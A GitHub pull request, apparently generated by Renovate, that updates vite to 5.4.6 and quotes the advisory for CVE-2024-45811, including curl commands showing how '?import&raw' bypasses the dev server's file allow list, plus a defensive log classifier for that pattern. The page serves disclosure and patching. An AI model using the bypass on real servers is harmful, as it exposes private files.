Update dependency vite to v5.4.6 [SECURITY] #2096

Merged
merged 1 commit into from
Sep 17, 2024

@gardener-ci-robot gardener-ci-robot commented Sep 17, 2024

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| vite (source) | devDependencies | patch | 5.4.2 -> 5.4.6 |

GitHub Vulnerability Alerts

CVE-2024-45811

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

Release Notes

vitejs/vite (vite)

v5.4.6

Please refer to CHANGELOG.md for details.

v5.4.5

Please refer to CHANGELOG.md for details.

v5.4.4

Please refer to CHANGELOG.md for details.

v5.4.3

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.
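
For reviewers who want to check dev-server request logs for the request shape described in the advisory above, the following is an added example; it is not code from Vite, Renovate or this repository. `ALLOW_ROOTS`, `classifyRequest`, `scan` and the sample lines are constructed for illustration.

```javascript
// Added example (not Vite's code): classify dev-server request URLs against
// the pattern in the advisory: /@fs/ path outside the allow list + ?import&raw.

// Assumption: the directory the dev server is meant to serve (constructed value).
const ALLOW_ROOTS = ['/home/dev/vite-project'];
const FS_PREFIX = '/@fs/';

function classifyRequest(rawUrl, allowRoots = ALLOW_ROOTS) {
  let url, file;
  try {
    url = new URL(rawUrl, 'http://localhost:5173');
    if (!url.pathname.startsWith(FS_PREFIX)) return { verdict: 'not-fs' };
    // Keep the leading slash so the result is an absolute file path.
    file = decodeURIComponent(url.pathname.slice(FS_PREFIX.length - 1));
  } catch {
    return { verdict: 'unparseable' };
  }
  // Any leftover parent-directory segment is treated as outside the allow list.
  const clean = !file.split('/').includes('..');
  const inside = clean && allowRoots.some(
    (root) => file === root || file.startsWith(root + '/'));
  if (inside) return { verdict: 'allowed', file };
  const q = url.searchParams;
  return q.has('import') && q.has('raw')
    ? { verdict: 'bypass-pattern', file }
    : { verdict: 'outside-allow-list', file };
}

// Constructed sample request lines ("METHOD URL"), not real log data.
const SAMPLE_LOG = [
  'GET /src/main.js',
  'GET /@fs/home/dev/vite-project/node_modules/vue/index.js',
  'GET /@fs/tmp/secret.txt',
  'GET /@fs/tmp/secret.txt?import&raw',
];

function scan(lines) {
  return lines.map((line) => {
    const url = line.split(' ')[1] ?? '';
    return { line, ...classifyRequest(url) };
  });
}

for (const r of scan(SAMPLE_LOG)) console.log(r.verdict.padEnd(20), r.line);
```

A `bypass-pattern` hit answered with a 200 status indicates the dev server was still on a version affected by the advisory when the request was served.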

@gardener-robot
@gardener-ci-robot Thank you for your contribution.

@gardener-robot gardener-robot added needs/review Needs review size/s Size of pull request is small (see gardener-robot robot/bots/size.py) labels Sep 17, 2024
@gardener-robot-ci-3 gardener-robot-ci-3 added the reviewed/ok-to-test Has approval for testing (check PR in detail before setting this label because PR is run on CI/CD) label Sep 17, 2024
@gardener-robot-ci-1 gardener-robot-ci-1 added needs/ok-to-test Needs approval for testing (check PR in detail before setting this label because PR is run on CI/CD) and removed reviewed/ok-to-test Has approval for testing (check PR in detail before setting this label because PR is run on CI/CD) labels Sep 17, 2024
@gardener-ci-robot gardener-ci-robot merged commit 9016659 into master Sep 17, 2024
5 checks passed
@gardener-ci-robot gardener-ci-robot deleted the renovate/npm-vite-vulnerability branch September 17, 2024 19:29
@gardener-robot gardener-robot added the status/closed Issue is closed (either delivered or triaged) label Sep 17, 2024
holgerkoser added a commit that referenced this pull request Sep 20, 2024
# By Gardener Prow Robot (50) and others
# Via GitHub
* master: (62 commits)
  Update dependency codemirror to v5.65.18 (#2101)
  Update dependency vite to v5.4.6 [SECURITY] (#2096)
  Fix issues with hibernation schedule dialog (#2076)
  Hide SSH keypair rotation when SSH access disabled (#2077)
  remove unnecessary model-value binding (#2080)
  Fix vite warning (#2090)
  Update dependency vuetify to v3.7.2 (#2095)
  Update vueuse monorepo to v11.1.0 (#2094)
  Update dependency @vueuse/core to v11.1.0 (#2091)
  Update dependency chokidar to v4 (#2081)
  Update dependency @fontsource/roboto to v5.1.0 (#2078)
  Update dependency jose to v5.9.2 (#2087)
  Update dependency express to v4.20.0 [SECURITY] (#2084)
  Update dependency vue to v3.5.6 (#2089)
  Update Yarn to v4.5.0 (#2088)
  Update dependency vue to v3.5.5 (#2086)
  Update dependency vue-router to v4.4.5 (#2083)
  Update dependency express-static-gzip to v2.1.8 (#2082)
  Update dependency vue-router to v4.4.4 (#2075)
  Update dependency openid-client to v5.7.0 (#2069)
  ...

# Conflicts:
#	.pnp.cjs
#	backend/package.json
#	frontend/package.json
#	frontend/src/components/ShootAddons/GManageAddons.vue
#	packages/kube-client/package.json
#	packages/kube-config/package.json
#	packages/logger/package.json
#	packages/monitor/package.json
#	packages/request/package.json
#	yarn.lock
Labels
kind/enhancement Enhancement, improvement, extension needs/ok-to-test Needs approval for testing (check PR in detail before setting this label because PR is run on CI/CD) needs/review Needs review renovate size/s Size of pull request is small (see gardener-robot robot/bots/size.py) status/closed Issue is closed (either delivered or triaged)